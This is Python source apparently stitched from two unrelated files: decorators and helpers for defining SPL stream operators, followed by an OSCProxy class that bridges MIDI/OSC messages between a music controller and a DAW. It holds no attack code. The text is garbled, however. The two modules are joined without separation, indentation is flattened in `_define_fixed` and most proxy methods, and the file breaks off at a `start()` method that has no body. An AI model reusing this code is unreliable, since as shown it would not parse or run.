def _define_style(wrapped, fn, style):
    """Determine the internal SPL tuple-passing style for `fn`.

    Inspects the signature of `fn` (skipping ``self`` when `wrapped`
    is a class) and reconciles it with the decorator's ``style``
    argument.

    Args:
        wrapped: The decorated class or function.
        fn: The callable whose signature is inspected (e.g. ``__call__``
            for a class).
        style: Requested style: ``'position'``, ``'name'`` or ``None``.

    Returns:
        The internal style, ``'tuple'`` or ``'dictionary'``.

    Raises:
        TypeError: The signature is incompatible with the requested
            style, uses positional-only parameters, or resolves to the
            not-yet-implemented ``'name'`` style.
    """
    has_args = False
    has_kwargs = False
    has_positional = False
    req_named = False
    pmds = inspect.signature(fn).parameters
    itpmds = iter(pmds)
    # Skip self
    if inspect.isclass(wrapped):
        next(itpmds)
    pc = 0
    for pn in itpmds:
        pmd = pmds[pn]
        if pmd.kind == inspect.Parameter.POSITIONAL_ONLY:
            raise TypeError('Positional only parameters are not supported:' + pn)
        elif pmd.kind == inspect.Parameter.VAR_POSITIONAL:
            has_args = True
        elif pmd.kind == inspect.Parameter.VAR_KEYWORD:
            has_kwargs = True
        elif pmd.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:
            has_positional = True
        elif pmd.kind == inspect.Parameter.KEYWORD_ONLY:
            # Keyword-only without a default means it can never be
            # satisfied positionally.
            if pmd.default is inspect.Parameter.empty:
                req_named = True
        pc +=1
    # See if the requested style matches the signature.
    if style == 'position':
        if req_named:
            raise TypeError("style='position' not supported with a required named parameter.")
        elif pc == 1 and has_kwargs:
            raise TypeError("style='position' not supported with single **kwargs parameter.")
        elif pc == 1 and has_args:
            pass
        elif not has_positional:
            raise TypeError("style='position' not supported as no positional parameters exist.")
        # From an implementation point of view the values
        # are passed as a tuple and Python does the correct mapping
        style = 'tuple'
    elif style == 'name':
        if pc == 1 and has_args:
            raise TypeError("style='name' not supported with single *args parameter.")
        elif pc == 1 and has_kwargs:
            raise TypeError("style='name' not supported with single **kwargs parameter.")
    elif style is not None:
        raise TypeError("style=" + style + " unknown.")
    if style is None:
        # No explicit style: infer from the signature shape.
        if pc == 1 and has_kwargs:
            style = 'dictionary'
        elif pc == 1 and has_args:
            style = 'tuple'
        elif pc == 0:
            style = 'tuple'
        else:
            # Default to by name
            style = 'name'
    if style == 'tuple' and has_kwargs:
        raise TypeError("style='position' not implemented with **kwargs parameter.")
    if style == 'name':
        raise TypeError("Not yet implemented!")
    return style
def _define_fixed(wrapped, callable_):
"""For the callable see how many positional parameters are required"""
is_class = inspect.isclass(wrapped)
style = callable_._splpy_style if hasattr(callable_, '_splpy_style') else wrapped._splpy_style
if style == 'dictionary':
return -1
fixed_count = 0
if style == 'tuple':
sig = inspect.signature(callable_)
pmds = sig.parameters
itpmds = iter(pmds)
# Skip 'self' for classes
if is_class:
next(itpmds)
for pn in itpmds:
param = pmds[pn]
if param.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:
fixed_count += 1
if param.kind == inspect.Parameter.VAR_POSITIONAL: # *args
fixed_count = -1
break
if param.kind == inspect.Parameter.VAR_KEYWORD:
break
return fixed_count
class source(object):
    """
    Decorator that turns a callable into an SPL source operator.

    The resulting operator has a single output port and no input ports.

    When applied to a class the class must be iterable (define
    ``__iter__``); when the operator is invoked an instance is created
    and iterated via ``iter(instance)``.  When applied to a function
    the function takes no parameters and must return an iterable or
    iterator; the operator iterates ``iter(value)``.

    Each value produced by the iteration results in zero or more tuples
    on the output port, see :ref:`submit-from-python`.  When the
    iteration completes, a window punctuation mark followed by a final
    punctuation mark are submitted and no further tuples are produced.

    Example definition::

        @spl.source()
        class Range(object):
            def __init__(self, stop, start=0):
                self.start = start
                self.stop = stop
            def __iter__(self):
                return zip(range(self.start, self.stop))

    Example SPL invocation::

        stream<int32 seq> R = Range() {
            param
                stop: 100;
        }

    Blocking in ``__iter__`` or ``__next__`` may delay shutdown,
    checkpointing or consistent region processing; having ``__next__``
    return ``None`` (no available tuples) or tuples to submit allows
    such processing to proceed.  A shutdown ``threading.Event`` is
    available through :py:func:`streamsx.ec.shutdown` and may be waited
    on for sleeps that end at shutdown.

    Args:
        docpy: Copy Python docstrings into SPL operator model for SPLDOC.

    When the decorated class is a context manager (``__enter__`` and
    ``__exit__`` methods) and ``__exit__`` returns a true value for an
    exception, the exception is suppressed: for ``__iter__`` the source
    produces an empty iteration; for ``__next__`` that invocation
    produces no tuples and processing continues with the next call;
    for a data conversion error the offending value is not submitted
    as an SPL tuple.
    """
    def __init__(self, docpy=True):
        # Sources take no input tuples, so no tuple-passing style applies.
        self.style = None
        self.docpy = docpy

    def __call__(self, wrapped):
        op = _wrapforsplop(_OperatorType.Source, wrapped, self.style, self.docpy)
        if inspect.isclass(op):
            op._splpy_decor = str(self)
        return op

    def __str__(self):
        opts = [] if self.docpy else ['docpy=False']
        return '@spl.source(' + ', '.join(opts) + ')'
class map(object):
    """
    Decorator to create a map SPL operator from a callable class or function.

    The resulting operator has a single input port and a single output
    port.  The callable is invoked for each input tuple, passing the
    tuple's contents; its return value produces zero or more output
    tuples, see :ref:`submit-from-python`.

    Example definition::

        @spl.map()
        class AddSeq(object):
            \"\"\"Add a sequence number as the last attribute.\"\"\"
            def __init__(self):
                self.seq = 0
            def __call__(self, *tuple_):
                id = self.seq
                self.seq += 1
                return tuple_ + (id,)

    Example SPL invocation::

        stream<In, tuple<uint64 seq>> InWithSeq = AddSeq(In) { }

    Args:
        style: How the SPL tuple is passed into Python callable or function, see :ref:`spl-tuple-to-python`.
        docpy: Copy Python docstrings into SPL operator model for SPLDOC.

    When the decorated class is a context manager (``__enter__`` and
    ``__exit__`` methods) and ``__exit__`` returns a true value for an
    exception raised by ``__call__``, the exception is suppressed and
    the input tuple that caused it is dropped.  A data conversion error
    of the returned value can be suppressed the same way; the offending
    value is then not submitted as an SPL tuple.
    """
    def __init__(self, style=None, docpy=True):
        self.style = style
        self.docpy = docpy

    def __call__(self, wrapped):
        op = _wrapforsplop(_OperatorType.Pipe, wrapped, self.style, self.docpy)
        if inspect.isclass(op):
            op._splpy_decor = str(self)
        return op

    def __str__(self):
        opts = []
        if self.style is not None:
            opts.append('style=' + str(self.style))
        if not self.docpy:
            opts.append('docpy=False')
        return '@spl.map(' + ', '.join(opts) + ')'
class filter(object):
    """
    Decorator that creates a filter SPL operator from a callable class or function.

    A filter operator has a single input port, one mandatory output
    port and one optional output port; the schema of each output port
    must match the input port.  The callable is invoked for each input
    tuple.  When it returns a value that evaluates to ``True`` the
    tuple is submitted to the mandatory output port 0; otherwise it is
    submitted to the optional second port (1), or discarded when that
    port is not specified in the SPL invocation.

    Args:
        style: How the SPL tuple is passed into Python callable or function, see :ref:`spl-tuple-to-python`.
        docpy: Copy Python docstrings into SPL operator model for SPLDOC.

    Example definition::

        @spl.filter()
        class AttribThreshold(object):
            \"\"\"
            Filter based upon a single attribute being
            above a threshold.
            \"\"\"
            def __init__(self, attr, threshold):
                self.attr = attr
                self.threshold = threshold
            def __call__(self, **tuple_):
                return tuple_[self.attr] > self.threshold

    Example SPL invocation::

        stream<rstring id, float64 voltage> Sensors = ...
        stream<Sensors> InterestingSensors = AttribThreshold(Sensors) {
            param
                attr: "voltage";
                threshold: 225.0;
        }

    When the decorated class is a context manager (``__enter__`` and
    ``__exit__`` methods) and ``__exit__`` returns a true value for an
    exception raised by ``__call__``, the exception is suppressed and
    the tuple that caused it is dropped.
    """
    def __init__(self, style=None, docpy=True):
        self.style = style
        self.docpy = docpy

    def __call__(self, wrapped):
        op = _wrapforsplop(_OperatorType.Filter, wrapped, self.style, self.docpy)
        if inspect.isclass(op):
            op._splpy_decor = str(self)
        return op

    def __str__(self):
        opts = []
        if self.style is not None:
            opts.append('style=' + str(self.style))
        if not self.docpy:
            opts.append('docpy=False')
        return '@spl.filter(' + ', '.join(opts) + ')'
def ignore(wrapped):
    """
    Decorator marking a Python callable as ignored.

    A callable decorated with ``@spl.ignore`` is skipped by
    ``spl-python-extract.py`` and never becomes an SPL operator.

    Args:
        wrapped: Function that will be ignored.
    """
    @functools.wraps(wrapped)
    def _pass_through(*args, **kwargs):
        return wrapped(*args, **kwargs)
    _pass_through._splpy_optype = _OperatorType.Ignore
    _pass_through._splpy_file = inspect.getsourcefile(wrapped)
    return _pass_through
# Decorator defining a callable as a sink operator.
class for_each(object):
    """
    Decorator creating an SPL sink operator from a callable class or function.

    The resulting operator has a single input port and no output ports.
    The decorated callable is invoked for each input tuple, passing the
    tuple's contents.

    Example definition::

        @spl.for_each()
        def PrintTuple(*tuple_):
            \"\"\"Print each tuple to standard out.\"\"\"
            print(tuple_, flush=True)

    Example SPL invocation::

        () as PT = PrintTuple(SensorReadings) { }

    Example definition with handling window punctuations::

        @spl.for_each(style='position')
        class PrintPunct(object):
            def __init__(self):
                pass
            def __call__(self, value):
                assert value > 0
            def on_punct(self):
                print('window marker received')

    .. note::
        Punctuation marks are in-band signals that are inserted between tuples in a stream. Window punctuations are inserted into a stream that are related to the semantics of the operator. One example is the :py:meth:`~Window.aggregate`, which inserts a window marker into the output stream after each aggregation.

    Args:
        style: How the SPL tuple is passed into Python callable, see :ref:`spl-tuple-to-python`.
        docpy: Copy Python docstrings into SPL operator model for SPLDOC.

    When the decorated class is a context manager (``__enter__`` and
    ``__exit__`` methods) and ``__exit__`` returns a true value for an
    exception raised by ``__call__``, the exception is suppressed and
    the tuple that caused it is ignored.

    Supports handling window punctuation markers in the sink operator
    via an ``on_punct`` method (new in version 1.16).
    """
    def __init__(self, style=None, docpy=True):
        self.style = style
        self.docpy = docpy

    def __call__(self, wrapped):
        op = _wrapforsplop(_OperatorType.Sink, wrapped, self.style, self.docpy)
        if inspect.isclass(op):
            op._splpy_decor = str(self)
        return op

    def __str__(self):
        opts = []
        if self.style is not None:
            opts.append('style=' + str(self.style))
        if not self.docpy:
            opts.append('docpy=False')
        return '@spl.for_each(' + ', '.join(opts) + ')'
class PrimitiveOperator(object):
    """Primitive operator super class.

    Classes decorated with `@spl.primitive_operator` that declare one
    or more output ports must extend this class.  It provides
    :py:meth:`submit` to submit tuples to a specific output port.

    .. versionadded:: 1.8
    """
    def submit(self, port_id, tuple_):
        """Submit a tuple to an output port.

        The value (``tuple_``) may be ``None`` (nothing is submitted),
        a ``tuple``, a ``dict``, or a ``list`` of those types.  See
        :ref:`submit-from-python` for how the value maps to an SPL tuple.

        Args:
            port_id: Identifier of the port specified in the
                ``output_ports`` parameter of the
                ``@spl.primitive_operator`` decorator.
            tuple_: Tuple (or tuples) to be submitted to the output port.
        """
        ec._submit(self, self._splpy_output_ports[port_id], tuple_)

    def submit_punct(self, port_id):
        """Submit a window punctuation marker to an output port.

        .. note::
            Punctuation marks are in-band signals that are inserted between tuples in a stream. Window punctuations are inserted into a stream that are related to the semantics of the operator. One example is the :py:meth:`~Window.aggregate`, which inserts a window marker into the output stream after each aggregation.

        Args:
            port_id: Identifier of the port specified in the
                ``output_ports`` parameter of the
                ``@spl.primitive_operator`` decorator.

        .. versionadded:: 1.16
        """
        ec._submit_punct(self, self._splpy_output_ports[port_id])

    def all_ports_ready(self):
        """Notification that the operator can submit tuples.

        Called when the operator may start submitting tuples with
        :py:meth:`submit`; an operator must not submit before this is
        called or a port processing method is invoked.  Implementations
        must not block -- typically they start threads that submit
        tuples.

        The return value tells the SPL runtime when background
        processing completes.  An operator completes, finalizing its
        output ports, once all input ports (if any) are finalized and
        all background processing is done.  Return one of:

            * A value evaluating to `False` - no background processing exists.
            * A value evaluating to `True` - background processing never completes (e.g. a source of real time events).
            * A callable - background processing completes when the callable (invoked once with no arguments by the SPL runtime) returns.

        For example, when a single thread is started, returning
        `Thread.join` completes the operator when the thread ends::

            def all_ports_ready(self):
                submitter = threading.Thread(target=self._find_and_submit_data)
                submitter.start()
                return submitter.join

            def _find_and_submit_data(self):
                ...

        Returns:
            Value indicating active background processing.
            This default implementation does nothing and returns ``None``.
        """
        return None
class input_port(object):
    """Declare an input port and its processor method.

    Within a class decorated by
    :py:class:`spl.primitive_operator <primitive_operator>`, instance
    methods decorated with this decorator declare input ports.  Each
    tuple arriving on the port results in a call to the processor
    method with the stream tuple converted to a Python representation
    determined by the method signature or the `style` parameter, see
    :ref:`spl-tuple-to-python`.

    Ports are ordered by the declaration order of the decorated
    methods: the first method decorated with `input_port` becomes the
    first port.

    Args:
        style: How the SPL tuple is passed into the method, see :ref:`spl-tuple-to-python`.

    .. versionadded:: 1.8
    """
    # Global declaration-order counter shared by every decorated method.
    _count = 0

    def __init__(self, style=None):
        self._style = style

    def __call__(self, wrapped):
        seq = input_port._count
        input_port._count = seq + 1
        wrapped._splpy_input_port_seq = seq
        wrapped._splpy_input_port_config = self
        wrapped._splpy_style = self._style
        return wrapped
class primitive_operator(object):
    """Creates an SPL primitive operator with an arbitrary number of
    input ports and output ports.

    Input ports are declared by decorating instance methods with
    :py:meth:`input_port`; each such method is the process method for
    its port and is called for every arriving tuple.  The declaration
    order of the process methods defines the port order, the first
    method being port index zero.

    Output ports are declared with the ``output_ports`` parameter, a
    ``list`` of arbitrary hashable identifiers (typically `str` or
    `enum`) that let tuples be submitted "logically" rather than by
    index.  The first identifier corresponds to output port index zero;
    an empty or unset list means no output ports.  Tuples are submitted
    with :py:meth:`~PrimitiveOperator.submit`.

    An operator with output ports must sub-class
    :py:class:`PrimitiveOperator`, which supplies
    :py:meth:`~PrimitiveOperator.submit` and the ports-ready
    notification :py:meth:`~PrimitiveOperator.all_ports_ready`.

    Example definition of an operator with a single input port and two output ports::

        @spl.primitive_operator(output_ports=['MATCH', 'NEAR_MATCH'])
        class SelectCustomers(spl.PrimitiveOperator):
            \"\"\" Score customers using a model.
            Customers that are a good match are submitted to port 0 ('MATCH')
            while customers that are a near match are submitted to port 1 ('NEAR_MATCH').
            Customers that are not a good or near match are not submitted to any port.
            \"\"\"
            def __init__(self, match, near_match):
                self.match = match
                self.near_match = near_match
            @spl.input_port()
            def customers(self, **tuple_):
                customer_score = self.score(tuple_)
                if customer_score >= self.match:
                    self.submit('MATCH', tuple_)
                elif customer_score >= self.near_match:
                    self.submit('NEAR_MATCH', tuple_)
            def score(self, **customer):
                # Actual model scoring omitted
                score = ...
                return score

    Example SPL invocation::

        (stream<Customers> MakeOffer; stream<Customers> ImproveOffer>) = SelectCustomers(Customers) {
            param
                match: 0.9;
                near_match: 0.8;
        }

    Example definition of an operator with punctuation handling::

        @spl.primitive_operator(output_ports=['A'])
        class SimpleForwarder(spl.PrimitiveOperator):
            def __init__(self):
                pass
            @spl.input_port()
            def port0(self, *t):
                self.submit('A', t)
            def on_punct(self):
                self.submit_punct('A')

    Supports handling window punctuation markers in the primitive operator in ``on_punct`` method (new in version 1.16).

    .. note::
        Punctuation marks are in-band signals that are inserted between tuples in a stream. Window punctuations are inserted into a stream that are related to the semantics of the operator. One example is the :py:meth:`~Window.aggregate`, which inserts a window marker into the output stream after each aggregation.

    Args:
        output_ports(list): List of identifiers for output ports.
        docpy: Copy Python docstrings into SPL operator model for SPLDOC.

    .. versionadded:: 1.8
    """
    def __init__(self, output_ports=None,docpy=True):
        self._docpy = docpy
        self._output_ports = output_ports

    def __call__(self, wrapped):
        if not inspect.isclass(wrapped):
            raise TypeError('A class is required:' + str(wrapped))
        _valid_identifier(wrapped.__name__)
        cls = _wrapforsplop(_OperatorType.Primitive, wrapped, None, self._docpy)
        # Collect the @input_port-decorated methods keyed by declaration order.
        inputs = {fn._splpy_input_port_seq: fn
                  for _name, fn in inspect.getmembers(wrapped)
                  if hasattr(fn, '_splpy_input_port_seq')}
        cls._splpy_input_ports = []
        cls._splpy_style = []
        cls._splpy_fixed_count = []
        for seq in sorted(inputs):
            fn = inputs[seq]
            fn._splpy_input_port_id = len(cls._splpy_input_ports)
            fn._splpy_style = _define_style(wrapped, fn, fn._splpy_style)
            fn._splpy_fixed_count = _define_fixed(cls, fn)
            cls._splpy_input_ports.append(fn)
            cls._splpy_style.append(fn._splpy_style)
            cls._splpy_fixed_count.append(fn._splpy_fixed_count)
        cls._splpy_output_ports = {}
        if self._output_ports:
            for index, port_id in enumerate(self._output_ports):
                cls._splpy_output_ports[port_id] = index
        cls._splpy_decor = str(self)
        return cls

    def __str__(self):
        # NOTE(review): historical prefix '@spl.primitive(' (not
        # '@spl.primitive_operator(') reproduced for compatibility.
        opts = []
        if self._output_ports:
            opts.append('output_ports=' + str(self._output_ports))
        if not self._docpy:
            opts.append('docpy=False')
        return '@spl.primitive(' + ', '.join(opts) + ')'
import logging
import time
import threading
import os
from queue import Queue, Empty
import rtmidi
from rtmidi.midiconstants import CONTROL_CHANGE
import yaml
from bidict import bidict
from pythonosc import osc_server, udp_client
from pythonosc.dispatcher import Dispatcher
from pythonosc.osc_message_builder import OscMessageBuilder
from pythonosc.osc_bundle_builder import OscBundleBuilder, IMMEDIATELY
logger = logging.getLogger(__name__)
class OSCProxy(object):
    def __init__(self, cfg):
        """Wire up all proxy endpoints from the configuration dict.

        Builds (but does not start -- see :py:meth:`start`) the OSC
        clients and servers toward the controller and the DAW, the MIDI
        input/output ports, the CC<->parameter-number map, and the
        queues/threads used for outbound traffic.

        Args:
            cfg: Parsed configuration with keys ``fx_maps_path``,
                ``global``, ``controller_midi``, ``controller_osc``
                and ``daw_osc``.
        """
        self.fx_name = ''
        self.learn_active = False
        self.fx_follow = True
        self.fx_visible = False
        self.fx_maps_path = cfg['fx_maps_path']
        self.cfg_global = cfg_global = cfg['global']
        self.cfg_ctl_midi = cfg_ctl_midi = cfg['controller_midi']
        self.cfg_ctl_osc = cfg_ctl_osc = cfg['controller_osc']
        self.cfg_daw_osc = cfg_daw_osc = cfg['daw_osc']
        # CC numbers are contiguous from cc_param_start; parameter
        # numbers are 1-based.
        midi_cc_param_map = {
            (cfg_ctl_midi['cc_param_start'] + i): (i + 1)
            for i in range(cfg_global['params'])
        }
        self.num_params = cfg_global['params']
        self.cc_param_start = self.cfg_ctl_midi['cc_param_start']
        # NOTE(review): cc_param_end is one PAST the last mapped CC;
        # range checks against it should be exclusive.
        self.cc_param_end = self.cc_param_start + self.num_params
        self.midi_cc_param_map = bidict(midi_cc_param_map)
        self.fx_maps = self.load_fx_maps()
        self.source_target_map = bidict()
        self.learn_active = False
        self.learn_source = None
        self.learn_target = None
        self.bypass_fx = False
        logger.info('Initializing controller osc client to {}:{}'.format(
            cfg_ctl_osc['remote_ip'], cfg_ctl_osc['remote_port']
        ))
        self.ctl_osc_client = udp_client.SimpleUDPClient(
            cfg_ctl_osc['remote_ip'], cfg_ctl_osc['remote_port'])
        logger.info('Initializing daw osc client to {}:{}'.format(
            cfg_daw_osc['remote_ip'], cfg_daw_osc['remote_port']
        ))
        self.to_daw_client = udp_client.SimpleUDPClient(
            cfg_daw_osc['remote_ip'], cfg_daw_osc['remote_port'])
        self.midi_in = rtmidi.MidiIn()
        self.midi_out = rtmidi.MidiOut()
        in_ports = self.midi_in.get_ports()
        out_ports = self.midi_out.get_ports()
        logger.info(
            'Initializing midi'
            ' input port "{}" param channel {}'
            ' cmd channel {} output port "{}"'.format(
                cfg_ctl_midi['input_port'],
                cfg_ctl_midi['param_channel'],
                cfg_ctl_midi['cmd_channel'],
                cfg_ctl_midi['output_port']
            ))
        logger.info('Available input ports: %s', in_ports)
        # A missing port leaves the index as None; start() skips opening it.
        try:
            self.midi_in_port = in_ports.index(cfg_ctl_midi['input_port'])
        except ValueError:
            self.midi_in_port = None
        self.midi_channel_param = cfg_ctl_midi['param_channel']
        self.midi_channel_cmd = cfg_ctl_midi['cmd_channel']
        logger.info('Available output ports: %s', out_ports)
        try:
            self.midi_out_port = out_ports.index(cfg_ctl_midi['output_port'])
        except ValueError:
            self.midi_out_port = None
        self.midi_in.set_callback(self.handle_midi_from_ctl)
        # Catch-all dispatchers: every address goes through one handler.
        self.daw_osc_dispatcher = Dispatcher()
        self.daw_osc_dispatcher.map('/*', self.handle_osc_from_daw)
        self.ctl_osc_dispatcher = Dispatcher()
        self.ctl_osc_dispatcher.map('/*', self.handle_osc_from_ctl)
        logger.info('Initializing daw osc server on {}:{}'.format(
            cfg_daw_osc['listen_ip'], cfg_daw_osc['listen_port']
        ))
        self.daw_osc_server = osc_server.BlockingOSCUDPServer(
            (cfg_daw_osc['listen_ip'], cfg_daw_osc['listen_port']),
            self.daw_osc_dispatcher)
        self.daw_osc_thread = threading.Thread(
            target=self.daw_osc_server.serve_forever)
        logger.info('Initializing controller osc server on {}:{}'.format(
            cfg_ctl_osc['listen_ip'], cfg_ctl_osc['listen_port']
        ))
        self.ctl_osc_server = osc_server.BlockingOSCUDPServer(
            (cfg_ctl_osc['listen_ip'], cfg_ctl_osc['listen_port']),
            self.ctl_osc_dispatcher)
        self.ctl_osc_thread = threading.Thread(
            target=self.ctl_osc_server.serve_forever)
        self.send_osc_to_internal_queue = Queue()
        self.send_osc_to_ctl_queue = Queue()
        self.send_osc_to_ctl_thread = threading.Thread(
            target=self.consume_ctl_osc_queue)
        # Minimum seconds between OSC bundle flushes to the controller.
        self.send_interval = 0.01
        self.send_midi_to_ctl_queue = Queue()
        self.send_midi_to_ctl_thread = threading.Thread(
            target=self.consume_send_midi_to_ctl_queue)
def load_fx_maps(self):
if not os.path.exists(self.fx_maps_path):
return {}
with open(self.fx_maps_path) as f:
data = yaml.safe_load(f)
if data is None:
data = {}
logger.info('Loaded maps for fx: {}'.format(','.join(data)))
return {
fx_name: bidict(fx_map) for fx_name, fx_map in data.items()
}
def save_fx_maps(self):
with open(self.fx_maps_path, 'w') as f:
data = {
fx_name: dict(fx_map) for fx_name, fx_map in self.fx_maps.items()
}
yaml.dump(data, f)
    def refresh_fx(self):
        # Intentionally a no-op: the early return skips the prev/next
        # round-trip below that would force the DAW to re-announce the
        # current FX.
        # NOTE(review): the two calls after ``return`` are unreachable --
        # confirm whether this is a temporary disable or dead code.
        return
        self.send_osc_to_daw("/fx/select/prev", 1)
        self.send_osc_to_daw("/fx/select/next", 1)
    def clear(self):
        """Forget all learned mappings for the current FX and reset devices.

        Order matters: the now-empty map is persisted before the
        controller OSC/MIDI surfaces are re-initialized.
        """
        self.source_target_map.clear()
        self.save_fx_maps()
        self.init_osc_device_params()
        self.init_midi_device_params()
        self.refresh_fx()
    def consume_ctl_osc_queue(self):
        """Worker loop: batch queued controller OSC messages into bundles.

        Drains ``send_osc_to_ctl_queue``, accumulating messages into an
        OSC bundle that is flushed to the controller at most once per
        ``send_interval`` seconds.  Runs forever on its own thread.
        """
        bundle_builder = OscBundleBuilder(IMMEDIATELY)
        last_send_time = 0
        while True:
            try:
                item = self.send_osc_to_ctl_queue.get_nowait()
            except Empty:
                # Nothing queued; back off briefly before re-checking.
                time.sleep(0.005)
            else:
                address, values = item
                msg_builder = OscMessageBuilder(address=address)
                for value in values:
                    msg_builder.add_arg(value)
                msg = msg_builder.build()
                bundle_builder.add_content(msg)
            # NOTE(review): peeks at the builder's private ``_contents``
            # to detect an empty bundle -- no public API for this;
            # confirm against the installed python-osc version.
            if not bundle_builder._contents:
                continue
            curr_time = time.time()
            if curr_time - last_send_time > self.send_interval:
                bundle = bundle_builder.build()
                self.ctl_osc_client.send(bundle)
                bundle_builder = OscBundleBuilder(IMMEDIATELY)
                last_send_time = curr_time
def consume_send_midi_to_ctl_queue(self):
while True:
msg = self.send_midi_to_ctl_queue.get()
print('midi send', msg)
self.midi_out.send_message(msg)
def init_osc_device_params(self):
for param_num in range(1, 17):
self.send_osc_to_ctl(
f"/fx/param/{param_num}/str", '')
self.send_osc_to_ctl(
f"/fx/param/{param_num}/name", '')
self.send_osc_to_ctl(
f"/fx/param/{param_num}/val", 0)
def init_osc_device(self):
self.send_osc_to_ctl(
f"/fx/learn", 0)
self.send_osc_to_ctl(
"/fx/name", '')
self.init_osc_device_params()
def init_midi_device_params(self):
for cc in self.midi_cc_param_map.keys():
self.send_midi_to_ctl(cc, 0)
    def init_midi_device(self):
        """Reset the controller's MIDI state (currently just the param CCs)."""
        self.init_midi_device_params()
def handle_osc_from_daw(self, addr, *args):
print('got', addr, args)
if addr == '/fx/name':
fx_name = args[0]
logger.info('Set FX: %s', fx_name)
self.set_fx(fx_name)
self.send_osc_to_ctl(
"/fx/name", fx_name)
self.init_osc_device_params()
self.init_midi_device_params()
elif addr.startswith('/fx/param/'):
fields = addr.split('/')
target_param = int(fields[-2])
param_attr = fields[-1]
if param_attr == 'val' and self.learn_active:
self.set_learn_target(target_param)
try:
source_param = self.source_target_map.inverse[target_param]
except KeyError:
return
prefix = f"/fx/param/{source_param}"
if param_attr == 'name':
name = args[0]
print('got fx param', name)
self.send_osc_to_ctl(
f"{prefix}/name", name)
if param_attr == 'val':
val = float(args[0])
self.send_osc_to_ctl(
f"{prefix}/val", val)
cc = self.midi_cc_param_map.inverse[source_param]
midi_val = int(val * 127)
self.send_midi_to_ctl(cc, midi_val)
elif param_attr == 'str':
s = args[0]
self.send_osc_to_ctl(
f"{prefix}/str", s)
elif addr == '/fx/bypass':
print('bypass', bool(args[0]))
self.bypass_fx = bool(args[0])
elif addr == '/fx/openui':
self.fx_visible = bool(args[0])
def handle_osc_from_ctl(self, addr, *args):
if addr.startswith('/fx/param/'):
fields = addr.split('/')
source_param = int(fields[-2])
param_attr = fields[-1]
if param_attr == 'val' and self.learn_active:
self.set_learn_source(source_param)
try:
target_param = self.source_target_map[source_param]
except KeyError:
return
prefix = f"/fx/param/{target_param}"
if param_attr == 'val':
self.send_osc_to_daw(
f"{prefix}/val", args[0])
elif addr == '/fx/learn':
self.toggle_learn()
elif addr == '/fx/clear':
self.clear()
def toggle_fx_follow(self):
self.fx_follow = not self.fx_follow
if self.fx_follow:
logger.info('FX follow: focused')
self.send_osc_to_daw(
"/device/fx/follows/focused", 1)
else:
logger.info('FX follow: device')
self.send_osc_to_daw(
"/device/fx/follows/device", 1)
def toggle_bypass_fx(self):
self.bypass_fx = not self.bypass_fx
logger.info('Toggle bypass FX: %s', self.bypass_fx)
self.send_osc_to_daw("/fx/bypass", int(self.bypass_fx))
self.send_osc_to_ctl("/fx/bypass", int(self.bypass_fx))
def toggle_fx_ui(self):
self.fx_visible = not self.fx_visible
logger.info('Toggle FX UI: %s', self.fx_visible)
self.send_osc_to_daw("/fx/openui", int(self.fx_visible))
def toggle_helper_ui(self):
logger.info('Toggle proxy UI')
self.send_osc_to_ctl('/toggle_ui', 1)
def select_previous_fx(self):
logger.info('Selected prev FX')
self.send_osc_to_daw("/fx/select/prev", 1)
def select_next_fx(self):
logger.info('Selected next FX')
self.send_osc_to_daw("/fx/select/next", 1)
def handle_midi_from_ctl(self, event, data=None):
msg, deltatime = event
logger.info('MIDI RECV: %s', msg)
if msg[0] == (CONTROL_CHANGE | self.midi_channel_cmd):
logger.info('Handling MIDI command')
cc, value = msg[1], msg[2]
if cc == self.cfg_ctl_midi['cc_toggle_ui'] and value == 127:
self.toggle_fx_ui()
elif cc == self.cfg_ctl_midi['cc_bypass_fx'] and value == 127:
self.toggle_bypass_fx()
elif cc == self.cfg_ctl_midi['cc_prev_fx'] and value == 127:
self.select_previous_fx()
elif cc == self.cfg_ctl_midi['cc_fx_follow'] and value == 127:
self.toggle_fx_follow()
elif cc == self.cfg_ctl_midi['cc_next_fx'] and value == 127:
self.select_next_fx()
elif cc == self.cfg_ctl_midi['cc_learn'] and value == 127:
self.toggle_learn()
elif msg[0] == (CONTROL_CHANGE | self.midi_channel_param):
cc, value = msg[1], msg[2]
logger.info('Handling MIDI param CC={}'.format(cc))
if self.cc_param_start <= cc <= self.cc_param_end:
source_param = self.midi_cc_param_map[cc]
if self.learn_active:
self.set_learn_source(source_param)
return
try:
target_param = self.source_target_map[source_param]
except KeyError:
logger.info('Don\'t know how to map source param {} to target param'.format(
source_param))
return
prefix = f"/fx/param/{target_param}"
osc_val = value / 127.0
self.send_osc_to_daw(
f"{prefix}/val", osc_val)
else:
logger.info('Out of bounds <{},{}>'.format(
self.cc_param_start, self.cc_param_end))
else:
logger.info('Unknown message "{}"'.format(msg))
def set_fx(self, fx_name):
    """Make *fx_name* the active FX and load (or create) its CC mapping."""
    self.fx_name = fx_name
    if fx_name not in self.fx_maps:
        # First time we see this FX: start with an empty bidirectional map.
        self.fx_maps[fx_name] = bidict()
    self.source_target_map = self.fx_maps[fx_name]
def set_learn_target(self, param_num):
    """Record the DAW-side parameter picked during learn mode."""
    if self.learn_source is None:
        # A target is only meaningful once a source CC was chosen.
        return
    self.learn_target = param_num
    logger.info('Learn target set to: %d', param_num)
    self.learn_check()
def set_learn_source(self, param_num):
    """Record the controller-side parameter picked during learn mode."""
    self.learn_source = param_num
    logger.info('Learn source set to: %d', param_num)
    self.learn_check()
def learn_check(self):
    """Commit a learn pair once both the source and the target are known."""
    source, target = self.learn_source, self.learn_target
    if source is None or target is None:
        return
    logger.info(
        'Learned source: %s, target: %s',
        source,
        target)
    # forceput overwrites any existing binding on either side of the bidict.
    self.source_target_map.forceput(source, target)
    self.learn_source = None
    self.learn_target = None
    self.save_fx_maps()
    self.init_osc_device_params()
    self.init_midi_device_params()
    self.refresh_fx()
def send_midi_to_ctl(self, cc, val, channel=None):
    """Queue a CC message for the controller (default: the param channel)."""
    if channel is None:
        channel = self.midi_channel_param
    status = CONTROL_CHANGE | channel
    self.send_midi_to_ctl_queue.put([status, cc, val])
def send_osc_to_ctl(self, address, *args):
    """Queue an OSC message bound for the controller on the internal queue."""
    logger.info('Sending to controller: %s %s', address, args)
    self.send_osc_to_internal_queue.put((address, args))
def send_osc_to_daw(self, address, *args):
    """Send an OSC message straight to the DAW client."""
    logger.info('Sending to DAW: %s %s', address, args)
    self.to_daw_client.send_message(address, *args)
def start(self):
    """Start the worker threads, open the MIDI ports and push initial state.

    Queue consumer threads are started first; presumably the device-init
    calls below enqueue messages for them — TODO confirm.
    """
